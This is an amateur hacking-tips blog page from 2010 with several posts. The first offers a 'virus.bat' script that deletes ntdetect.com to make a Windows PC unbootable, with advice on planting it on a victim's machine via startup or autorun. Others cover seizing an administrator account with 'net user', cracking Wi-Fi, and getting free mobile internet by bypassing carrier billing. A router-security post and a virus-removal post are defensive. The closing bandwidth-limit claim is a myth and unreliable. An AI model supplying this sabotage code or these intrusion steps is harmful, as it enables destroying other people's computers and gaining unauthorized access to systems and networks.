Monday, August 23, 2010

Crash ur Friends PC


I dont know wether it works or not so better be careful
HEY HERE IS THE SIMPLE WAY 2 BLOCK URS ENEMEIS PC
The Simple Deadliest Code
open notepad type the code as following -
___________________________________________________
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print U r a LOSER.. PC Hacked by DRG!!!
____________________________________________________
save this file as virus.bat or any other name with bat extension
Double click it in the victim’s computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.
BANG !
with this activated once the computer will run perfectly !
once shutdowned then it will not start and U will have to format it (Except U know how to use DOS).
Enjoy !!
**********DON’T TRY ON YOUR COMPUTER I HAVE EXPERIENCED IT….LOL**********
P.S. :- IF THERE IS ANY MISTAKE IN CODE THEN PLEASE GUIDE ME

Hack Computer Administrator


Hack Admin Tutorial:
If you want to hack A computer’s Administrator that is very easy.
If you are logged in to computer with some other account here are the steps:
1. Go to Start button click on run
2. Type CMD and press enter
3. A command window will open
4. Type net users
5. This will show you all the users of that computer.
6. Now type net user administrator * and press enter
7. This will ask you to enter a password
8. Enter the password you want to keep for the administrator
9. Re-enter your password to confirm it.
10. DONE
You have changed the password of computer administrator. Now you can logoff that user and can login as administrator with the password you have kept.
HAPPY HACKING :)

Hacking Tools For Linux


Interested in knowing about the Best Hacking Tools for Linux:
Many people all around the world are just transforming themselves from windows to Linux operating systems, the reason is security, and also many feel that it is quite easy to hack from Linux rather than from windows. so I just planned to Share some of the most efficient tools that are used mainly these days to hack a website or a victim or whatever. So the Below complete list provides you some of the best hacking tools of Linux, Go ahead and choose the one of your choice…
*Ettercap:
Ettercap is a console-based network sniffer/interceptor/logger that is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap also has the ability to actively or passively find other poisoners on the LAN.
* Nikto
Nikto is a web server scanner that is known to perform comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. It performs generic and server type specific checks. It also captures and prints any cookies received.
* OpenSSH
OpenSSH is a Free and Open Source version of the SSH connectivity tools providing encrypted communication sessions over a computer network. It encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.


* Aircrack-ng
Aircrack-ng is a wireless tool and password cracker. It is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.


* Tripwire
Tripwire is a security and data integrity tool that is useful for monitoring and alerting on specific file change(s) on a range of systems. Used with system files on a regular basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.


* Metasploit Framework
Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit-building demo.


* THC Hydra
THC (The Hacker’s Choice) Hydra uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services. It was designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen passwords. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.


* Dsniff
Dsniff is suite of powerful network auditing and penetration-testing tools and utilities that includes code to parse many different application protocols and extract interesting information. The information that can be obtained from this sniff application are: usernames and passwords, web pages being visited, contents of email, etc.



* RainbowCrack
RainbowCrack is a password hash cracker that makes use of a large-scale time-memory trade-off. It differs from “conventional” brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.


* rkhunter
rkhunter scans for rootkits, backdoors and possible local exploits. It does this by comparing SHA-1 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

These are various hacking tools that mostly used by hackers all around the world, These tools are more Perfect and gives a Steady Tracking of the Victim. So, if you are finding for one such Linux hacking tool, then Just Choose the Best one which suits you more. Hope u liked the article, Feel free to write comments, Happy Hacking :)

How to remove new folder exe or regsvr exe or autorun inf virus


Here is The Best way to Remove the Virus Manually When your Antivirus Fails:
  • Search for autorun.inf file. It is a read only file so you will have to change it to normal by right clicking the file , selecting the properties and un-check the read only option

  • Open the file in notepad and delete everything and save the file.

  • Now change the file status back to read only mode so that the virus could not get access again.

  • Now Follow the Steps Below, and do as said,

  • First Step:
    1. Click start->run and type msconfig and click ok
    2. Go to startup tab look for regsvr and uncheck the option click OK.
    3. Click on Exit without Restart, cause there are still few things we need to do before we can restart the PC.
    4. Now go to control panel -> scheduled tasks, and delete the At1 task listed their.
    Second Step:
    • Click on start -> run and type gpedit.msc and click Ok.
    • If you are Windows XP Home Edition user you might not have gpedit.msc in that case download and install it from Windows XP Home Edition: gpedit.msc and then follow these steps.
    • Go to users configuration->Administrative templates->system
    • Find “prevent access to registry editing tools” and change the option to disable.
    • Once you do this you have registry access back.
    Third Step:
    • Click on start->run and type regedit and click ok
    • Go to edit->find and start the search for regsvr.exe
    • Delete all the occurrence of regsvr.exe; remember to take a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences only.
    • At one ore two places you will find it after explorer.exe in theses cases only delete the regsvr.exe part and not the whole part. E.g. Shell = “Explorer.exe regsvr.exe” the just delete the regsvr.exe and leave the explorer.exe
    Fourth Step:
    • Click on start->search->for files and folders.
    • Their click all files and folders
    • Type “*.exe” as filename to search for
    • Click on ‘when was it modified ‘ option and select the specify date option
    • Type from date as 1/31/2008 and also type To date as 1/31/2008
    • Now hit search and wait for all the exe’s to show up.
    • Once search is over select all the exe files and shift+delete the files, caution must be taken so that you don’t delete the legitimate exe file that you have installed on 31stJanuary.
    • Also selecting lot of files together might make your computer unresponsive so delete them in small bunches.
    • Also find and delete regsvr.exe, svchost .exe( notice an extra space between the svchost and .exe)
    Fifth Step:
    • Now do a cold reboot (ie press the reboot button instead) and you are done.
    I hope u liked the article, to fight around all those virus and trojans, hope your happy now :) so kindly leave a comment….

    Wanna hack Wi-fi Passwords using your Ubuntu Linux?


    Hacking Wi-Fi Password Using Ubuntu Linux – I know a lot of you out there would love to know how to hack or crack Wi-Fi passwords from coffee shops or just about any place with managed or secured network.
    I’ve already featured several hacking software before, and some of which can help you crack Wi-Fi passwords be it WEP or WPA protected. This time, I’m going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password using Ubuntu or any other Linux distribution:
    Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has awireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.
    Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any loggable packets.
    SWScanner is specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.
    These are only three of the many wireless tools that can get you going in no time, so feel free to explore.
    I don’t want to give a step-by-step instruction just yet on how to hack or crack WiFi password using Ubuntu, but for a little inspiration, I’ll share with you a YouTube video that pretty much illustrate the process of using those Wi-Fi hacking software:
    I hope u learnt alot frm this article, If u like this, Feel Free to Leave a Comment :)

    Free Internet using Sim


    Sim hack: works on idea and airtel (havent tested in other sim’s)
    First Lets Start with the requirments:
    1. You Need a sim with minimum of 0.20 credit in it or even with no credit,but make sure the gprs signal is visible.
    2. You need a phone that can be used as a modem to connect your computer to the internet. Such as Nokia phones with Nokia PC suite software or Motorola Phones with M Phone tools software.
    3. You Need a Computer or Laptop
    4. You need to register on 
    your freedom and get your username and password to use the software.
    (your registered username and details of registeration will be sent to the email u used in registering,it might take a while for ur account to be authenticate
    5. Download Your Freedom from here: http://www.your-freedom.net/index.php?id=3 (use the latest version)
    NOW LETS START SETTING UP YOUR COMPUTER YOUR FREE BROWSING!!
    1. Dowload and Install Your-Freedom and enter these settings.
    Let me just explain everything step by step. Open Your-Freedom
    -Click on the status tab. Then clicked on configure.
    - On the server connection tab.Use these settings:
    Address: ems24.your-freedom.de
    Port:53
    Connection Mode: UDP
    now on the option below it
    check boxes Numbers 3,5,6,7,8
    Next Click on Account Information and enter the username and password you recieved when you registered
    Next Click on Proxy Settings Tab and enter these settings.
    Proxy Address: 94.126.16.6.7
    Proxy Port:53
    Proxy Username: “leave this blank”
    Proxy Password: “leave this blank”
    Proxy Domain: “leave this blank”
    Proxy Type: HTTP/HTTPS
    Proxy Authentication: Any or none
    User Agent: “leave this blank”
    FTP Proxy Server:
    Proxy Address “leave this blank”
    Proxy Port: “leave this blank”
    Now click on Save and Exit.
    Now on the Your-Freedom Menu. Click on ports and tick OPEN VPN, SOCKS 4/5, and WEB PROXY,
    Click on messages
    Check Auto scroll
    minimum level – DEBUG
    CLICK ON APPLICATION,tick the browsers and instant messanges you will use and then click ok
    Now download Firefox or any other browser. its better to download firefox :) and just follow the below configuration
    open firefox goto – tools – options -Advanced – Network – settings – clik on Manual Proxy configuration. Then for http,ssl,ftp,gopher enter as localhost posrt:8080 for socks host localhost port: 1080. in No proxy for: localhost, 127.0.0.1
    click ok…
    now make a default connection using ur PC suite and check wether the gprs signal is present in the mobile.. make a new connection and open your freedom now, click start connection and Njoy free internet… Happy hacking.. still u have any doubts leave a comment i will clarify :)
    Dont forget to say a thx :D

    Here are a few steps to keep your Wireless Network secure


    “Remember nothing is unbreakable”
    1) Secure your wireless router or access point administration interface
    Almost all routers and access points have an administrator password that’s needed to log into the device and modify any configuration settings. Most devices use a weak default password like “password” or the manufacturer’s name, and some don’t have a default password at all. As soon as you set up a new WLAN router or access point, your first step should be to change the default password to something else. You may not use this password very often, so be sure to write it down in a safe place so you can refer to it if needed. Without it, the only way to access the router or access point may be to reset it to factory default settings which will wipe away any configuration changes you’ve made.
    2) Don’t broadcast your SSID
    Most WLAN access points and routers automatically (and continually) broadcast the network’s name, or SSID (Service Set IDentifier). This makes setting up wireless clients extremely convenient since you can locate a WLAN without having to know what it’s called, but it will also make your WLAN visible to any wireless systems within range of it. Turning off SSID broadcast for your network makes it invisible to your neighbors and passers-by (though it will still be detectible by WLAN “sniffers like kismet”).

    3)Enable WPA/WPA2 encryption instead of WEP
    802.11′s WEP (Wired Equivalency Privacy) encryption has well-known weaknesses that make it relatively easy for a determined user with the right equipment to crack the encryption and access the wireless network. A better way to protect your WLAN is with WPA (Wi-Fi Protected Access). WPA provides much better protection and is also easier to use, since your password characters aren’t limited to 0-9 and A-F as they are with WEP. WPA support is built into Windows XP (with the latest Service Pack) and virtually all modern wireless hardware and operating systems. A more recent version, WPA2, is found in newer hardware and provides even stronger encryption, but you’ll probably need to download an XP patch in order to use it.
    4) Remember that WEP is better than nothing
    If you find that some of your wireless devices only support WEP encryption (this is often the case with non-PC devices like media players, PDAs, and DVRs), avoid the temptation to skip encryption entirely because in spite of it’s flaws, using WEP is still far superior to having no encryption at all. If you do use WEP, don’t use an encryption key that’s easy to guess like a string of the same or consecutive numbers. Also, although it can be a pain, WEP users should change encryption keys often– preferably every week.
    5) Use MAC filtering for access control
    Unlike IP addresses, MAC addresses are unique to specific network adapters, so by turning on MAC filtering you can limit network access to only your systems (or those you know about). In order to use MAC filtering you need to find (and enter into the router or AP) the 12-character MAC address of every system that will connect to the network, so it can be inconvenient to set up, especially if you have a lot of wireless clients or if your clients change a lot. MAC addresses can be “spoofed” (imitated) by a knowledgable person, so while it’s not a guarantee of security, it does add another hurdle for potential intruders to jump.
    6) Reduce your WLAN transmitter power
    You won’t find this feature on all wireless routers and access points, but some allow you lower the power of your WLAN transmitter and thus reduce the range of the signal. Although it’s usually impossible to fine-tune a signal so precisely that it won’t leak outside your home or business, with some trial-and-error you can often limit how far outside your premises the signal reaches, minimizing the opportunity for outsiders to access your WLAN.
    7) Disable remote administration
    Most WLAN routers have the ability to be remotely administered via the Internet. Ideally, you should use this feature only if it lets you define a specific IP address or limited range of addresses that will be able to access the router. Otherwise, almost anyone anywhere could potentially find and access your router. As a rule, unless you absolutely need this capability, it’s best to keep remote administration turned off. (It’s usually turned off by default, but it’s always a good idea to check.)

    Increase Internet Speed XP by 20%


    We knew that Windows XP Professional has limited the net on 20%?
    That is, you have access to only 80% of its net, making it much slower loading web pages, etc .. including Downloads….
    This tutorial will show you step by step ways to increase your internet to 100%, You will feel the Real Difference after the changes…
    Follow these steps to make your net 100% ‘
    1. start menu …. (Run)
    2. In run type … gpedit.msc
    Will open the Group Policy!
    3 Open the folder “Models administrator”
    4 Open the folder “Network”
    5 Open the folder “Packet Scheduler” QoS
    6 Click two times on “Limit reservable bandwidth”
    A window will open with three options!
    ? Not Configured.
    ? On.
    ? Off
    Check “Enabled”.
    And where shown 20%, and erase it and make it “0″.
    Click “Apply” and then “Ok”
    Now your ready to use 100% of your Internet….